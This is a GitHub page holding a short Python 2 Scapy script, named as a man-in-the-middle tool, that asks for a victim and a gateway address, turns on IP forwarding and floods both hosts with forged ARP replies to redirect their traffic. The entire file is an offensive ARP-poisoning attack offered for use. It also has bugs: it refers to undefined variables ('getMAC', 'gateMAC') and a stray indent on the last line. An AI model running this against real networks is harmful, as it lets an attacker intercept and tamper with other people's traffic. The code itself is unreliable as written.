Python/Man_in_the_middle.py at patch-8 · Zureno/Python · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from scapy.all import *
import sys
import os
import time

try:
          interface = raw_input("[*] Enter Desired Interface: ")
          victimIP = raw_input("[*] Enter Victim IP: ")
          gateIP = raw_input("[*] Enter IP to target: ")
except KeyboardInterrupt:
          print "\n[*] User Requested Shutdown"
          print "[*] Exiting ...."
          sys.exit(1)
print "\n[*] Enabling IP Forwarding .....\n"
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")

def get_mac(IP):
        conf.verb = 0
        ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff" )/ARP(pdst = IP), timeout = 2,iface = interface,inter = 0.1)
        for snd,rcv in ans:
                return rcv.sprintf(r"%Ether.src%")

def reARP():

       print "\n[*] Restoring Targets ..."
       victimMAC = get_mac(victimIP)
       gateMAC = get_mac(gateIP)
       send(ARP(op = 2,pdst = gateIP,psrc = victimIP,hwdst = "ff:ff:ff:ff:ff:ff",hwsrc = victimMAC),count = 7)
       send(ARP(op = 2,pdst = victimIP,psrc = gateIP,hwdst = "ff:ff:ff:ff:ff:ff",hwsrc = getMAC),count = 7)
       print "[*] Disabling IP forwarding ..."
       os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
       print "[*] Shutting Down ..."
       sys.exit(1)

def trick(gm,vm):
        send(ARP(op = 2 ,pdst = victimIP,psrc = gateIP,hwdst = vm))
        send(ARP(op = 2, pdst = gateIP,psrc = victimIP,hwdst = gm))

def mitm():
        try:
                victimMAC = get_mac(victimIP)
        except Exception:
               os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
               print "[!] Could not find Victim MAC Address"
               print "[!] Exiting ...."
               sys.exit(1)
        try:
               getmac = get_mac(gateIP)
        except Exception:
               os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
               print "[!] Could not find the gateways MAC Address"
               print "[!] Exiting ...."
               sys.exit(1)
        print "[!] Poisioning Targets ...."
        while 1:
               try:
                   trick(gateMAC,victimMAC)
                   time.sleep(1.5)
               except KeyboardInterrupt:
                        reARP()
                        break
 mitm()